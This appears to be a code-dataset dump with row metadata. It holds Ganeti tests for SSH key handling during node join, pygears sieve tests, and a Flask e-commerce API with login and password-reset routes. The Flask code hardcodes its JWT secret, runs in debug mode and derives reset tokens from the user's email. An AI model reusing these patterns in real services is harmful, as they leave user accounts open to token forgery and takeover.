_keyfiles=NotImplemented)
self.assertEqual(os.listdir(self.tmpdir), [])
def _TestDryRun(self, data):
prepare_node_join.UpdateSshDaemon(data, True, _runcmd_fn=NotImplemented,
_keyfiles=self.keyfiles)
self.assertEqual(os.listdir(self.tmpdir), [])
def testDryRunRsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_RSA, "rsapriv", "rsapub"),
],
})
def testDryRunDsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_DSA, "dsapriv", "dsapub"),
],
})
def testDryRunEcdsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_ECDSA, "ecdsapriv", "ecdsapub"),
],
})
def _RunCmd(self, fail, cmd, interactive=NotImplemented):
self.assertTrue(interactive)
self.assertEqual(cmd, [pathutils.DAEMON_UTIL, "reload-ssh-keys"])
if fail:
exit_code = constants.EXIT_FAILURE
else:
exit_code = constants.EXIT_SUCCESS
return utils.RunResult(exit_code, None, "stdout", "stderr",
utils.ShellQuoteArgs(cmd),
NotImplemented, NotImplemented)
def _TestUpdate(self, failcmd):
data = {
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_DSA, "dsapriv", "dsapub"),
(constants.SSHK_ECDSA, "ecdsapriv", "ecdsapub"),
(constants.SSHK_RSA, "rsapriv", "rsapub"),
],
constants.SSHS_SSH_KEY_TYPE: "dsa",
constants.SSHS_SSH_KEY_BITS: 1024,
}
runcmd_fn = compat.partial(self._RunCmd, failcmd)
if failcmd:
self.assertRaises(_JoinError, prepare_node_join.UpdateSshDaemon,
data, False, _runcmd_fn=runcmd_fn,
_keyfiles=self.keyfiles)
else:
prepare_node_join.UpdateSshDaemon(data, False, _runcmd_fn=runcmd_fn,
_keyfiles=self.keyfiles)
self.assertEqual(sorted(os.listdir(self.tmpdir)), sorted([
"rsa.public", "rsa.private",
"dsa.public", "dsa.private",
"ecdsa.public", "ecdsa.private",
]))
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "rsa.public")),
"rsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "rsa.private")),
"rsapriv")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "dsa.public")),
"dsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "dsa.private")),
"dsapriv")
self.assertEqual(utils.ReadFile(utils.PathJoin(
self.tmpdir, "ecdsa.public")), "ecdsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(
self.tmpdir, "ecdsa.private")), "ecdsapriv")
def testSuccess(self):
self._TestUpdate(False)
def testFailure(self):
self._TestUpdate(True)
class TestUpdateSshRoot(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
self.sshdir = utils.PathJoin(self.tmpdir, ".ssh")
def tearDown(self):
unittest.TestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def _GetHomeDir(self, user):
self.assertEqual(user, constants.SSH_LOGIN_USER)
return self.tmpdir
def testDryRun(self):
data = {
constants.SSHS_SSH_ROOT_KEY: [
(constants.SSHK_RSA, "aaa", "bbb"),
]
}
prepare_node_join.UpdateSshRoot(data, True,
_homedir_fn=self._GetHomeDir)
self.assertEqual(os.listdir(self.tmpdir), [".ssh"])
self.assertEqual(os.listdir(self.sshdir), [])
def testUpdate(self):
data = {
constants.SSHS_SSH_ROOT_KEY: [
(constants.SSHK_DSA, "privatedsa", "ssh-dss pubdsa"),
],
constants.SSHS_SSH_KEY_TYPE: "dsa",
constants.SSHS_SSH_KEY_BITS: 1024,
}
prepare_node_join.UpdateSshRoot(data, False,
_homedir_fn=self._GetHomeDir)
self.assertEqual(os.listdir(self.tmpdir), [".ssh"])
self.assertEqual(sorted(os.listdir(self.sshdir)),
sorted(["authorized_keys", "id_dsa", "id_dsa.pub"]))
self.assertTrue(utils.ReadFile(utils.PathJoin(self.sshdir, "id_dsa"))
is not None)
pub_key = utils.ReadFile(utils.PathJoin(self.sshdir, "id_dsa.pub"))
self.assertTrue(pub_key is not None)
self.assertEquals(utils.ReadFile(utils.PathJoin(self.sshdir,
"authorized_keys")),
pub_key)
if __name__ == "__main__":
testutils.GanetiTestProgram()
| 34.177165 | 80 | 0.665592 |
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
import unittest
import shutil
import tempfile
import os.path
from ganeti import errors
from ganeti import constants
from ganeti import pathutils
from ganeti import compat
from ganeti import utils
from ganeti.tools import prepare_node_join
from ganeti.tools import common
import testutils
_JoinError = prepare_node_join.JoinError
_DATA_CHECK = prepare_node_join._DATA_CHECK
class TestVerifyCertificate(testutils.GanetiTestCase):
def setUp(self):
testutils.GanetiTestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
testutils.GanetiTestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def testNoCert(self):
common.VerifyCertificateSoft({}, error_fn=prepare_node_join.JoinError,
_verify_fn=NotImplemented)
def testGivenPrivateKey(self):
cert_filename = testutils.TestDataFilename("cert2.pem")
cert_pem = utils.ReadFile(cert_filename)
self.assertRaises(_JoinError, common._VerifyCertificateSoft,
cert_pem, _JoinError, _check_fn=NotImplemented)
def testInvalidCertificate(self):
self.assertRaises(errors.X509CertError,
common._VerifyCertificateSoft,
"Something that's not a certificate",
_JoinError, _check_fn=NotImplemented)
@staticmethod
def _Check(cert):
assert cert.get_subject()
def testSuccessfulCheck(self):
cert_filename = testutils.TestDataFilename("cert1.pem")
cert_pem = utils.ReadFile(cert_filename)
common._VerifyCertificateSoft(cert_pem, _JoinError,
_check_fn=self._Check)
class TestUpdateSshDaemon(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
self.keyfiles = {
constants.SSHK_RSA:
(utils.PathJoin(self.tmpdir, "rsa.private"),
utils.PathJoin(self.tmpdir, "rsa.public")),
constants.SSHK_DSA:
(utils.PathJoin(self.tmpdir, "dsa.private"),
utils.PathJoin(self.tmpdir, "dsa.public")),
constants.SSHK_ECDSA:
(utils.PathJoin(self.tmpdir, "ecdsa.private"),
utils.PathJoin(self.tmpdir, "ecdsa.public")),
}
def tearDown(self):
unittest.TestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def testNoKeys(self):
data_empty_keys = {
constants.SSHS_SSH_HOST_KEY: [],
}
for data in [{}, data_empty_keys]:
for dry_run in [False, True]:
prepare_node_join.UpdateSshDaemon(data, dry_run,
_runcmd_fn=NotImplemented,
_keyfiles=NotImplemented)
self.assertEqual(os.listdir(self.tmpdir), [])
def _TestDryRun(self, data):
prepare_node_join.UpdateSshDaemon(data, True, _runcmd_fn=NotImplemented,
_keyfiles=self.keyfiles)
self.assertEqual(os.listdir(self.tmpdir), [])
def testDryRunRsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_RSA, "rsapriv", "rsapub"),
],
})
def testDryRunDsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_DSA, "dsapriv", "dsapub"),
],
})
def testDryRunEcdsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_ECDSA, "ecdsapriv", "ecdsapub"),
],
})
def _RunCmd(self, fail, cmd, interactive=NotImplemented):
self.assertTrue(interactive)
self.assertEqual(cmd, [pathutils.DAEMON_UTIL, "reload-ssh-keys"])
if fail:
exit_code = constants.EXIT_FAILURE
else:
exit_code = constants.EXIT_SUCCESS
return utils.RunResult(exit_code, None, "stdout", "stderr",
utils.ShellQuoteArgs(cmd),
NotImplemented, NotImplemented)
def _TestUpdate(self, failcmd):
data = {
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_DSA, "dsapriv", "dsapub"),
(constants.SSHK_ECDSA, "ecdsapriv", "ecdsapub"),
(constants.SSHK_RSA, "rsapriv", "rsapub"),
],
constants.SSHS_SSH_KEY_TYPE: "dsa",
constants.SSHS_SSH_KEY_BITS: 1024,
}
runcmd_fn = compat.partial(self._RunCmd, failcmd)
if failcmd:
self.assertRaises(_JoinError, prepare_node_join.UpdateSshDaemon,
data, False, _runcmd_fn=runcmd_fn,
_keyfiles=self.keyfiles)
else:
prepare_node_join.UpdateSshDaemon(data, False, _runcmd_fn=runcmd_fn,
_keyfiles=self.keyfiles)
self.assertEqual(sorted(os.listdir(self.tmpdir)), sorted([
"rsa.public", "rsa.private",
"dsa.public", "dsa.private",
"ecdsa.public", "ecdsa.private",
]))
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "rsa.public")),
"rsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "rsa.private")),
"rsapriv")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "dsa.public")),
"dsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "dsa.private")),
"dsapriv")
self.assertEqual(utils.ReadFile(utils.PathJoin(
self.tmpdir, "ecdsa.public")), "ecdsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(
self.tmpdir, "ecdsa.private")), "ecdsapriv")
def testSuccess(self):
self._TestUpdate(False)
def testFailure(self):
self._TestUpdate(True)
class TestUpdateSshRoot(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
self.sshdir = utils.PathJoin(self.tmpdir, ".ssh")
def tearDown(self):
unittest.TestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def _GetHomeDir(self, user):
self.assertEqual(user, constants.SSH_LOGIN_USER)
return self.tmpdir
def testDryRun(self):
data = {
constants.SSHS_SSH_ROOT_KEY: [
(constants.SSHK_RSA, "aaa", "bbb"),
]
}
prepare_node_join.UpdateSshRoot(data, True,
_homedir_fn=self._GetHomeDir)
self.assertEqual(os.listdir(self.tmpdir), [".ssh"])
self.assertEqual(os.listdir(self.sshdir), [])
def testUpdate(self):
data = {
constants.SSHS_SSH_ROOT_KEY: [
(constants.SSHK_DSA, "privatedsa", "ssh-dss pubdsa"),
],
constants.SSHS_SSH_KEY_TYPE: "dsa",
constants.SSHS_SSH_KEY_BITS: 1024,
}
prepare_node_join.UpdateSshRoot(data, False,
_homedir_fn=self._GetHomeDir)
self.assertEqual(os.listdir(self.tmpdir), [".ssh"])
self.assertEqual(sorted(os.listdir(self.sshdir)),
sorted(["authorized_keys", "id_dsa", "id_dsa.pub"]))
self.assertTrue(utils.ReadFile(utils.PathJoin(self.sshdir, "id_dsa"))
is not None)
pub_key = utils.ReadFile(utils.PathJoin(self.sshdir, "id_dsa.pub"))
self.assertTrue(pub_key is not None)
self.assertEquals(utils.ReadFile(utils.PathJoin(self.sshdir,
"authorized_keys")),
pub_key)
if __name__ == "__main__":
testutils.GanetiTestProgram()
| true | true |
7901199d5463ed6267d0b721d5056abb66f44d76 | 442 | py | Python | tests/svgen/test_sieve.py | Risto97/pygears | 19393e85101a16762cb3bbbf3010946ef69217f2 | [
"MIT"
] | null | null | null | tests/svgen/test_sieve.py | Risto97/pygears | 19393e85101a16762cb3bbbf3010946ef69217f2 | [
"MIT"
] | null | null | null | tests/svgen/test_sieve.py | Risto97/pygears | 19393e85101a16762cb3bbbf3010946ef69217f2 | [
"MIT"
] | null | null | null | from nose import with_setup
from pygears import Intf, clear
from pygears.typing import Queue, Uint
from utils import svgen_check
@with_setup(clear)
@svgen_check(['sieve_0v2_7_8v10.sv'])
def test_uint():
iout = Intf(Uint[10])[:2, 7, 8:]
assert iout.dtype == Uint[5]
@with_setup(clear)
@svgen_check(['sieve_0v2_3_5v7.sv'])
def test_queue():
iout = Intf(Queue[Uint[2], 6])[:2, 3, 5:]
assert iout.dtype == Queue[Uint[2], 4]
| 21.047619 | 45 | 0.690045 | from nose import with_setup
from pygears import Intf, clear
from pygears.typing import Queue, Uint
from utils import svgen_check
@with_setup(clear)
@svgen_check(['sieve_0v2_7_8v10.sv'])
def test_uint():
iout = Intf(Uint[10])[:2, 7, 8:]
assert iout.dtype == Uint[5]
@with_setup(clear)
@svgen_check(['sieve_0v2_3_5v7.sv'])
def test_queue():
iout = Intf(Queue[Uint[2], 6])[:2, 3, 5:]
assert iout.dtype == Queue[Uint[2], 4]
| true | true |
79011ab78b18cfdf827a9175719865cd05515572 | 11,814 | py | Python | server/API.py | lucas-almeida-silva/gama-sports | c287680a645941bc16fc09a350167922171fa30d | [
"MIT"
] | null | null | null | server/API.py | lucas-almeida-silva/gama-sports | c287680a645941bc16fc09a350167922171fa30d | [
"MIT"
] | null | null | null | server/API.py | lucas-almeida-silva/gama-sports | c287680a645941bc16fc09a350167922171fa30d | [
"MIT"
] | 1 | 2020-11-28T13:44:45.000Z | 2020-11-28T13:44:45.000Z | from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
import uuid
from werkzeug.security import generate_password_hash, check_password_hash
import jwt
import datetime
from functools import wraps
from flask_mail import Mail, Message
import bcrypt
import re
from validate_email import validate_email
from validate_docbr import CPF
from sqlalchemy.ext.declarative import declarative_base
from flask_marshmallow import Marshmallow
from flask_cors import CORS, cross_origin
from marshmallow import fields
Base = declarative_base()
app = Flask(__name__)
mail= Mail(app)
CORS(app, support_credentials=True)
app.config['CORS_HEADERS'] = 'Content-Type'
app.config['SECRET_KEY'] = 'thisissecret'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///banco.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_SERVER']='smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = ''
app.config['MAIL_PASSWORD'] = ''
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
db = SQLAlchemy(app)
ma = Marshmallow(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
public_id = db.Column(db.String(50), unique=True)
name = db.Column(db.String(50))
cpf = db.Column(db.String(11))
birthdate = db.Column(db.String(10))
gender = db.Column(db.String(1))
phone = db.Column(db.String(11))
email = db.Column(db.String(50))
password = db.Column(db.String(80))
passwordResetToken = db.Column(db.String(250))
passwordResetExpires = db.Column(db.String(100))
class Product(db.Model, Base):
__tablename__ = 'products'
product_id = db.Column(db.Integer, primary_key=True)
description = db.Column(db.String(250))
price = db.Column(db.Float)
installments = db.Column(db.Integer)
sizes = db.Column(db.String(50))
availableSizes = db.Column(db.String(50))
gender = db.Column(db.String(1))
material = db.Column(db.String(50))
color = db.Column(db.String(50))
brand = db.Column(db.String(50))
carts = db.relationship('Cart',secondary='cart_products')
class Image(db.Model, Base):
__tablename__ = 'products_imgs'
img_id = db.Column(db.Integer, primary_key=True)
url = db.Column(db.String(300))
product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'))
product = db.relationship('Product', backref='images')
class Cart(db.Model, Base):
__tablename__ = 'cart'
cart_id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
total_amount = db.Column(db.Float)
create_dttm = db.Column(db.DateTime, default=datetime.datetime.utcnow)
user = db.relationship('User', backref='images')
products = db.relationship('Product', secondary = 'cart_products')
class CP(db.Model, Base):
__tablename__ = 'cart_products'
id = db.Column(db.Integer, primary_key=True)
product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'))
cart_id = db.Column(db.Integer, db.ForeignKey('cart.cart_id'))
quantity = db.Column(db.Integer)
size = db.Column(db.String(5))
product = db.relationship(Product, backref=db.backref("cart_products", cascade="all, delete-orphan"))
cart = db.relationship(Cart, backref=db.backref("cart_products", cascade="all, delete-orphan"))
class ImageSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Image
include_fk = True
class ProductSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Product
images = fields.Nested(ImageSchema, many=True, only=['url'])
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'message' : 'Token is missing!'}), 401
try:
data = jwt.decode(token, app.config['SECRET_KEY'])
current_user = User.query.filter_by(public_id=data['public_id']).first()
except:
return jsonify({'message' : 'Token is invalid!'}), 401
return f(current_user, *args, **kwargs)
return decorated
@app.route('/user/<public_id>', methods=['GET'])
@cross_origin(supports_credentials=True)
@token_required
def get_one_user(current_user, public_id):
user = User.query.filter_by(public_id=public_id).first()
if not user:
return jsonify({'message' : 'Usuário não encontrado!'}), 400
user_data = {}
user_data['public_id'] = user.public_id
user_data['name'] = user.name
user_data['cpf'] = user.cpf
user_data['birthdate'] = user.birthdate
user_data['gender'] = user.gender
user_data['phone'] = user.phone
user_data['email'] = user.email
return jsonify({'user' : user_data}), 200
@app.route('/users', methods=['POST'])
@cross_origin(supports_credentials=True)
def create_user():
cpf = CPF()
data = request.get_json()
if not all(x.isalpha() or x.isspace() for x in str(data['name'])) or len(str(data['name'])) < 3 or len(str(data['name'])) > 100:
return jsonify({'message' : 'Nome inválido!'}), 400
elif not cpf.validate(str(data['cpf'])):
return jsonify({'message' : 'CPF inválido!'}), 400
elif datetime.date.today().year - datetime.datetime.strptime(str(data['birthdate']), "%d/%m/%Y").year < 18:
return jsonify({'message' : 'Usuário menor de idade!'}), 400
elif str(data['gender']) != "M" and str(data['gender']) != "F":
return jsonify({'message' : 'Gênero inválido!'}), 400
elif not str(data['phone']).isdigit() or len(str(data['phone'])) < 10:
return jsonify({'message' : 'Telefone inválido!'}), 400
elif not validate_email(str(data['email'])):
return jsonify({'message' : 'Email inválido!'}), 400
elif len(str(data['password'])) < 8 or len(str(data['password'])) > 20:
return jsonify({'message' : 'Senha inválida!'}), 400
prospect_cpf = User.query.filter_by(cpf=data['cpf']).first()
prospect_email = User.query.filter_by(email=data['email']).first()
if prospect_cpf:
return jsonify({'message' : 'CPF já cadastrado!'}), 400
elif prospect_email:
return jsonify({'message' : 'Email já cadastrado!'}), 400
hashed_password = generate_password_hash(data['password'], method='sha256')
new_user = User(public_id=str(uuid.uuid4()), name=data['name'], cpf=data['cpf'], birthdate=data['birthdate'],
gender=data['gender'], phone=data['phone'], email=data['email'], password=hashed_password, passwordResetToken=None, passwordResetExpires=None)
db.session.add(new_user)
db.session.commit()
return jsonify({'message' : 'Usuário cadastrado com sucesso!'}), 200
@app.route('/users/<public_id>', methods=['DELETE'])
@cross_origin(supports_credentials=True)
@token_required
def delete_user(current_user, public_id):
user = User.query.filter_by(public_id=public_id).first()
if not user:
return jsonify({'message' : 'Usuário não encontrado'}), 400
db.session.delete(user)
db.session.commit()
return jsonify({'message' : 'Usuário apagado com sucesso!'}), 200
@app.route('/login', methods=['POST'])
@cross_origin(supports_credentials=True)
def login():
auth = request.get_json()
if not auth or not auth['email'] or not auth['password']:
return jsonify({'message' : 'Email ou senha não foram preenchidos!'}), 401
user = User.query.filter_by(email=auth['email']).first()
if not user:
return jsonify({'message' : 'Email não existe!'}), 401
if check_password_hash(user.password, auth['password']):
token = jwt.encode({'public_id' : user.public_id, 'exp' : datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8'), 'id' : user.public_id, 'name' : user.name, 'email' : user.email}), 200
return jsonify({'message' : 'Senha incorreta'}), 401
@app.route("/forgot-password", methods=['POST'])
@cross_origin(supports_credentials=True)
def send_email():
data = request.get_json()
user = User.query.filter_by(email=data['email']).first()
if not user:
return jsonify({'message' : "Email não encontrado!"}), 400
password = str(user.email).encode('UTF-8')
passToken = bcrypt.hashpw(password, bcrypt.gensalt())
passToken = re.sub('\W+','', str(passToken))
passExpires = str(datetime.datetime.utcnow() + datetime.timedelta(minutes=15))
user.passwordResetToken = passToken
user.passwordResetExpires = passExpires
db.session.commit()
msg = Message('Recuperação de senha - Gama Sports', sender = app.config['MAIL_USERNAME'], recipients = [user.email])
msg.body = "Olá " + str(user.email) + ", \n\n" + "Acesse o link a seguir para trocar sua senha: \n\n" + "http://localhost:4200/users/recover-password?token=" + str(passToken)
mail.send(msg)
return jsonify({'message' : "Email disparado!"}), 200
@app.route("/reset-password", methods=['POST'])
@cross_origin(supports_credentials=True)
def change_password():
data = request.get_json()
user = User.query.filter_by(passwordResetToken=str(data['token'])).first()
if not user:
return jsonify({'message' : "Token inválido!"}), 400
date_time_exp = datetime.datetime.strptime(user.passwordResetExpires, '%Y-%m-%d %H:%M:%S.%f')
if datetime.datetime.utcnow() > date_time_exp:
return jsonify({'message' : "Token expirado, gere um novo!"}), 400
if len(str(data['password'])) < 8 or len(str(data['password'])) > 20:
return jsonify({'message' : 'Senha inválida!'}), 400
hashed_newpassword = generate_password_hash(data['password'], method='sha256')
user.password = hashed_newpassword
user.passwordResetToken = None
user.passwordResetExpires = None
db.session.commit()
return jsonify({'message' : "Senha trocada com sucesso!"}), 200
@app.route('/products', methods=['GET'])
@cross_origin(supports_credentials=True)
def get_all_products():
search = request.args.get("search", None)
if not search:
products = Product.query.all()
else:
search = "%{}%".format(search)
products = Product.query.filter(Product.description.like(search)).all()
if not products:
return jsonify([]), 200
product_schema = ProductSchema(many=True)
output = product_schema.dump(products)
return jsonify(output), 200
@app.route('/products/<product_id>', methods=['GET'])
@cross_origin(supports_credentials=True)
def get_product(product_id):
product = Product.query.filter_by(product_id=product_id).first()
if not product:
return jsonify({'message' : 'Produto não encontrado!'}), 400
product_schema = ProductSchema()
output = product_schema.dump(product)
return jsonify(output), 200
@app.route('/cart', methods=['POST'])
@cross_origin(supports_credentials=True)
@token_required
def create_cart(current_user):
data = request.get_json()
cart = Cart(total_amount=data['total'], user_id=data['clientId'])
db.session.add(cart)
db.session.commit()
if not cart:
return jsonify({'message' : 'Problema na inclusão do carrinho'}), 400
for product in data['products']:
if not product:
return jsonify({'message' : 'Problema na inclusão do produto'}), 400
add_product = CP(product_id=product['id'], cart_id=cart.cart_id, quantity=product['quantity'], size=product['size'])
db.session.add(add_product)
db.session.commit()
return jsonify({'message' : 'Carrinho salvo com sucesso!'}), 200
if __name__ == '__main__':
app.run(debug=True) | 34.849558 | 178 | 0.675047 | from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
import uuid
from werkzeug.security import generate_password_hash, check_password_hash
import jwt
import datetime
from functools import wraps
from flask_mail import Mail, Message
import bcrypt
import re
from validate_email import validate_email
from validate_docbr import CPF
from sqlalchemy.ext.declarative import declarative_base
from flask_marshmallow import Marshmallow
from flask_cors import CORS, cross_origin
from marshmallow import fields
Base = declarative_base()
app = Flask(__name__)
mail= Mail(app)
CORS(app, support_credentials=True)
app.config['CORS_HEADERS'] = 'Content-Type'
app.config['SECRET_KEY'] = 'thisissecret'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///banco.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_SERVER']='smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = ''
app.config['MAIL_PASSWORD'] = ''
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
db = SQLAlchemy(app)
ma = Marshmallow(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
public_id = db.Column(db.String(50), unique=True)
name = db.Column(db.String(50))
cpf = db.Column(db.String(11))
birthdate = db.Column(db.String(10))
gender = db.Column(db.String(1))
phone = db.Column(db.String(11))
email = db.Column(db.String(50))
password = db.Column(db.String(80))
passwordResetToken = db.Column(db.String(250))
passwordResetExpires = db.Column(db.String(100))
class Product(db.Model, Base):
__tablename__ = 'products'
product_id = db.Column(db.Integer, primary_key=True)
description = db.Column(db.String(250))
price = db.Column(db.Float)
installments = db.Column(db.Integer)
sizes = db.Column(db.String(50))
availableSizes = db.Column(db.String(50))
gender = db.Column(db.String(1))
material = db.Column(db.String(50))
color = db.Column(db.String(50))
brand = db.Column(db.String(50))
carts = db.relationship('Cart',secondary='cart_products')
class Image(db.Model, Base):
__tablename__ = 'products_imgs'
img_id = db.Column(db.Integer, primary_key=True)
url = db.Column(db.String(300))
product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'))
product = db.relationship('Product', backref='images')
class Cart(db.Model, Base):
__tablename__ = 'cart'
cart_id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
total_amount = db.Column(db.Float)
create_dttm = db.Column(db.DateTime, default=datetime.datetime.utcnow)
user = db.relationship('User', backref='images')
products = db.relationship('Product', secondary = 'cart_products')
class CP(db.Model, Base):
__tablename__ = 'cart_products'
id = db.Column(db.Integer, primary_key=True)
product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'))
cart_id = db.Column(db.Integer, db.ForeignKey('cart.cart_id'))
quantity = db.Column(db.Integer)
size = db.Column(db.String(5))
product = db.relationship(Product, backref=db.backref("cart_products", cascade="all, delete-orphan"))
cart = db.relationship(Cart, backref=db.backref("cart_products", cascade="all, delete-orphan"))
class ImageSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Image
include_fk = True
class ProductSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Product
images = fields.Nested(ImageSchema, many=True, only=['url'])
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'message' : 'Token is missing!'}), 401
try:
data = jwt.decode(token, app.config['SECRET_KEY'])
current_user = User.query.filter_by(public_id=data['public_id']).first()
except:
return jsonify({'message' : 'Token is invalid!'}), 401
return f(current_user, *args, **kwargs)
return decorated
@app.route('/user/<public_id>', methods=['GET'])
@cross_origin(supports_credentials=True)
@token_required
def get_one_user(current_user, public_id):
user = User.query.filter_by(public_id=public_id).first()
if not user:
return jsonify({'message' : 'Usuário não encontrado!'}), 400
user_data = {}
user_data['public_id'] = user.public_id
user_data['name'] = user.name
user_data['cpf'] = user.cpf
user_data['birthdate'] = user.birthdate
user_data['gender'] = user.gender
user_data['phone'] = user.phone
user_data['email'] = user.email
return jsonify({'user' : user_data}), 200
@app.route('/users', methods=['POST'])
@cross_origin(supports_credentials=True)
def create_user():
cpf = CPF()
data = request.get_json()
if not all(x.isalpha() or x.isspace() for x in str(data['name'])) or len(str(data['name'])) < 3 or len(str(data['name'])) > 100:
return jsonify({'message' : 'Nome inválido!'}), 400
elif not cpf.validate(str(data['cpf'])):
return jsonify({'message' : 'CPF inválido!'}), 400
elif datetime.date.today().year - datetime.datetime.strptime(str(data['birthdate']), "%d/%m/%Y").year < 18:
return jsonify({'message' : 'Usuário menor de idade!'}), 400
elif str(data['gender']) != "M" and str(data['gender']) != "F":
return jsonify({'message' : 'Gênero inválido!'}), 400
elif not str(data['phone']).isdigit() or len(str(data['phone'])) < 10:
return jsonify({'message' : 'Telefone inválido!'}), 400
elif not validate_email(str(data['email'])):
return jsonify({'message' : 'Email inválido!'}), 400
elif len(str(data['password'])) < 8 or len(str(data['password'])) > 20:
return jsonify({'message' : 'Senha inválida!'}), 400
prospect_cpf = User.query.filter_by(cpf=data['cpf']).first()
prospect_email = User.query.filter_by(email=data['email']).first()
if prospect_cpf:
return jsonify({'message' : 'CPF já cadastrado!'}), 400
elif prospect_email:
return jsonify({'message' : 'Email já cadastrado!'}), 400
hashed_password = generate_password_hash(data['password'], method='sha256')
new_user = User(public_id=str(uuid.uuid4()), name=data['name'], cpf=data['cpf'], birthdate=data['birthdate'],
gender=data['gender'], phone=data['phone'], email=data['email'], password=hashed_password, passwordResetToken=None, passwordResetExpires=None)
db.session.add(new_user)
db.session.commit()
return jsonify({'message' : 'Usuário cadastrado com sucesso!'}), 200
@app.route('/users/<public_id>', methods=['DELETE'])
@cross_origin(supports_credentials=True)
@token_required
def delete_user(current_user, public_id):
user = User.query.filter_by(public_id=public_id).first()
if not user:
return jsonify({'message' : 'Usuário não encontrado'}), 400
db.session.delete(user)
db.session.commit()
return jsonify({'message' : 'Usuário apagado com sucesso!'}), 200
@app.route('/login', methods=['POST'])
@cross_origin(supports_credentials=True)
def login():
auth = request.get_json()
if not auth or not auth['email'] or not auth['password']:
return jsonify({'message' : 'Email ou senha não foram preenchidos!'}), 401
user = User.query.filter_by(email=auth['email']).first()
if not user:
return jsonify({'message' : 'Email não existe!'}), 401
if check_password_hash(user.password, auth['password']):
token = jwt.encode({'public_id' : user.public_id, 'exp' : datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8'), 'id' : user.public_id, 'name' : user.name, 'email' : user.email}), 200
return jsonify({'message' : 'Senha incorreta'}), 401
@app.route("/forgot-password", methods=['POST'])
@cross_origin(supports_credentials=True)
def send_email():
data = request.get_json()
user = User.query.filter_by(email=data['email']).first()
if not user:
return jsonify({'message' : "Email não encontrado!"}), 400
password = str(user.email).encode('UTF-8')
passToken = bcrypt.hashpw(password, bcrypt.gensalt())
passToken = re.sub('\W+','', str(passToken))
passExpires = str(datetime.datetime.utcnow() + datetime.timedelta(minutes=15))
user.passwordResetToken = passToken
user.passwordResetExpires = passExpires
db.session.commit()
msg = Message('Recuperação de senha - Gama Sports', sender = app.config['MAIL_USERNAME'], recipients = [user.email])
msg.body = "Olá " + str(user.email) + ", \n\n" + "Acesse o link a seguir para trocar sua senha: \n\n" + "http://localhost:4200/users/recover-password?token=" + str(passToken)
mail.send(msg)
return jsonify({'message' : "Email disparado!"}), 200
@app.route("/reset-password", methods=['POST'])
@cross_origin(supports_credentials=True)
def change_password():
data = request.get_json()
user = User.query.filter_by(passwordResetToken=str(data['token'])).first()
if not user:
return jsonify({'message' : "Token inválido!"}), 400
